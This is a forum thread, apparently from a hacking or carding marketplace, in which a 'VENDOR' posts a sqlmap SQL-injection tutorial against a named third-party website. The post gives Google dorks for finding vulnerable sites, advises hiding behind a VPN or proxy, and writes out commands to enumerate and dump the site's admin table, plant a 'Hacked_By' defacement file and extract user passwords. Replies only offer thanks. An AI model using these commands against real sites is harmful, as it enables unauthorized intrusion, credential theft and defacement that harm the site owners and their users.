If you have any questions, contact us:
ICQ:1607000
Jabber:9@jabber.ru

  #1 Old 01-13-2016, 08:14 AM
Helper
VENDOR
 
Helper's Avatar
 
Join Date: Jun 2014
Posts: 134
Contact: 6613622
Helper is on a distinguished road
Send a message via ICQ to Helper
Default Sqlmap Tutorial

Hello All Members!

Injection Tool: sqlmap

Official Page: http://sqlmap.org

Download Link: https://github.com/sqlmapproject/sqlmap/zipball/master

Testing: WIndows XP/SP3 , Python 2.7.5

vulnerability Page: http://www.godwins-law.co.uk/staff.php?id=10'

!!!!! Use OpenVPN OR PROXY !!!!!

Step1. Target

Google Dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc...

Target: http://www.godwins-law.co.uk/staff.php?id=10

Target WebServer Operating System: WIndows 2003

Target WebApplication: ASP.NET , Microsoft IIS 6.0 , PHP 5.2.8

Target BackEndDataBase: MySQL 5.0.0

Step2. DataBase

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs

--database--

godwins
information_schema

Step3. Table

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins --tables

--table--

adminhelp
articlecats
articles
contentimages
imagelib
news
pages
staff

Step4. Column & Dump

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --columns

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --dump

Step5. Hacked Text

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=Hacked_By_sasami_327.txt

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=Hacked_By_sasami_327.txt

Step6. user & password

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords
__________________
Helper is offline   Reply With Quote
  #2 Old 04-07-2016, 07:07 PM
rikketik
 
rikketik's Avatar
 
Join Date: Apr 2016
Posts: 7
rikketik is an unknown quantity at this point
Default

nice tut
rikketik is offline   Reply With Quote
  #3 Old 02-21-2017, 04:30 AM
dahu
 
dahu's Avatar
 
Join Date: Feb 2017
Posts: 5
dahu is an unknown quantity at this point
Default

nice tut thanks
dahu is offline   Reply With Quote
Reply

Tags
sqlmap, tutorial

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


The administration is not responsible for the actions of users. The information on this site is for informational purposes only.